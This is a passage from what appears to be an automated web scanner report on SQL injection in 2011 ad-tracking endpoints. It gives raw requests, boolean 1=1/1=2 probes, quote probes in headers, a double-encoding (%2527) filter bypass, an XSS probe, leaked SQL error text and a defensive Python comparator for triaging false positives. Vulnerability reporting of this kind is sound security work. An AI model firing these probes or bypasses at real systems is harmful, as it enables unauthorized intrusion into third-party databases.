Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d1--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d2--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

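A comparator of the kind the triage of 1.14 and 1.15 calls for, added here as an example (Python written for this report, not part of the scanner or of either site): it strips the headers that differed between the 1.14 responses without any change in the body, and reports whether a 1=1 / 1=2 pair still differs once that noise is removed. The response pairs are constructed: the SiteLife pair is modelled on the 1.14 capture, and the "genuine" pair is invented to show what a real signal looks like. The 1.15 pair, with its empty 204 bodies, needs the same header-by-header triage.

```python
import hashlib

# Added example, not part of the scanner report. The response pairs are
# constructed; VOLATILE_HEADERS lists the headers that differed between the
# 1.14 responses although the bodies were the same.

VOLATILE_HEADERS = {
    "date", "expires", "last-modified", "etag", "set-cookie",
    "cache-control", "x-sitelife-host", "connection",
}


def parse_response(raw):
    """Split a raw HTTP response into (status line, {header: [values]}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def stable_fingerprint(raw):
    """Status, non-volatile headers and a body digest: what a SQL condition
    would actually have to change for the boolean test to mean anything."""
    status, headers, body = parse_response(raw)
    kept = tuple(sorted(
        (name, tuple(values)) for name, values in headers.items()
        if name not in VOLATILE_HEADERS
    ))
    return status, kept, len(body), hashlib.sha256(body.encode()).hexdigest()


def header_differences(raw_a, raw_b):
    """Names of headers that differ between two responses, for triage."""
    _, ha, _ = parse_response(raw_a)
    _, hb, _ = parse_response(raw_b)
    return sorted(k for k in set(ha) | set(hb) if ha.get(k) != hb.get(k))


def boolean_test_signal(resp_true, resp_false):
    """True only if the 1=1 and 1=2 responses still differ with noise removed."""
    return stable_fingerprint(resp_true) != stable_fingerprint(resp_false)


def _resp(status, headers, body):
    return "\r\n".join([status] + headers) + "\r\n\r\n" + body


# Constructed body: same for both SiteLife responses, as in the 1.14 capture.
BODY = ("//multi site enabled -- sid: sitelife.desmoinesregister.com\n"
        "function SiteLifeProxy(url) { this.apiKey = null; }\n")

SITELIFE_TRUE = _resp("HTTP/1.1 200 OK", [
    "Set-Cookie: desmoinesprod=R4082863653; path=/",
    "Cache-Control: public, max-age=86400",
    "Content-Type: text/javascript; charset=utf-8",
    "ETag: -726392143",
    "x-SiteLife-host: gnvm25l3pluckcom",
    "Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/",
    "Content-Length: %d" % len(BODY),
], BODY)

SITELIFE_FALSE = _resp("HTTP/1.1 200 OK", [
    "Set-Cookie: desmoinesprod=R4081535073; path=/",
    "Cache-Control: public, max-age=84015",
    "Content-Type: text/javascript; charset=utf-8",
    "ETag: -1742467064",
    "x-SiteLife-host: gnvm11l3pluckcom",
    "Content-Length: %d" % len(BODY),
], BODY)

# Constructed pair where the injected condition really changes the result set.
GENUINE_TRUE = _resp("HTTP/1.1 200 OK", ["Content-Type: text/html"],
                     "<tr><td>one matching row</td></tr>")
GENUINE_FALSE = _resp("HTTP/1.1 200 OK", ["Content-Type: text/html"], "")


if __name__ == "__main__":
    print("sitelife:", boolean_test_signal(SITELIFE_TRUE, SITELIFE_FALSE),
          header_differences(SITELIFE_TRUE, SITELIFE_FALSE))
    print("genuine: ", boolean_test_signal(GENUINE_TRUE, GENUINE_FALSE))
```

For the SiteLife-style pair the comparator reports no signal and lists cache-control, etag, set-cookie and x-sitelife-host as the only differences; for the genuine pair the body digest differs and the signal is real. Repeating each payload several times before comparing, and pinning the backend where a host header such as x-SiteLife-host exposes it, removes most of the remaining noise.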

1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned (Incorrect syntax near the keyword 'Default'). Two single quotes were then submitted; contrary to the usual pattern, the error did not disappear but changed to a different SQL Server error (Error converting data type nvarchar to int). Both responses below therefore contain a database error, and both echo the statement being executed. You should review the contents of the error messages, and the application's handling of other input, to confirm the full impact.

The database appears to be Microsoft SQL Server. The echoed text SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId ... shows that the stored procedure is invoked through a statement assembled by string concatenation: the request parameters are pasted in as literals (bannerCreativeAdModuleId appears unquoted as c0260) and the Referer value is concatenated in somewhere after the visible part. Request headers are entirely attacker-controlled, so the whole argument list should be assumed injectable, and the Certain confidence rating is justified by the error text alone.

Remediation detail

The procedure should be executed with bound, typed parameters rather than a concatenated command string, and the application should handle errors gracefully and prevent SQL error messages, including the echoed statement text, from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:58 GMT
Expires: Mon, 14 Feb 2011 15:09:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQABSCD=FLMPGLGANBKJFNJEGIJHBAHE; path=/
X-Powered-By: ASP.NET
Content-Length: 788
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:10:02 GMT
Expires: Mon, 14 Feb 2011 15:10:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQQCDTBB=FEFHHLGAEMEGMJHHKFBIAOEF; path=/
X-Powered-By: ASP.NET
Content-Length: 790
Connection: keep-alive

<br>Error Description:Error converting data type nvarchar to int.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260%22%3E%3Cscript%3Ealert(1)%3C/script%3E92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:57 GMT
Expires: Mon, 14 Feb 2011 15:09:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCDCTAB=EIFDJOGAPINJDCCOICHBBKIJ; path=/
X-Powered-By: ASP.NET
Content-Length: 1558
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId = 49160,
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260%22%3E%3Cscript%3Ealert(1)%3C/script%3E92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:58 GMT
Expires: Mon, 14 Feb 2011 15:09:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCDCTAB=GJFDJOGAJBJJJBNJLNDOEJKN; path=/
X-Powered-By: ASP.NET
Content-Length: 1568
Connection: keep-alive

<br>Error Description:Error converting data type nvarchar to int.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047%2527&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:56 GMT
Expires: Mon, 14 Feb 2011 01:41:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=MDJLPDEAADPMDJOHFMBJCMJL; path=/
X-Powered-By: ASP.NET
Content-Length: 1401
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotat
...[SNIP]...

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:14 GMT
Expires: Mon, 14 Feb 2011 01:42:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDASTCAQQC=LDMLGBKDPDJFNIBBNADNPNMD; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772%27, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

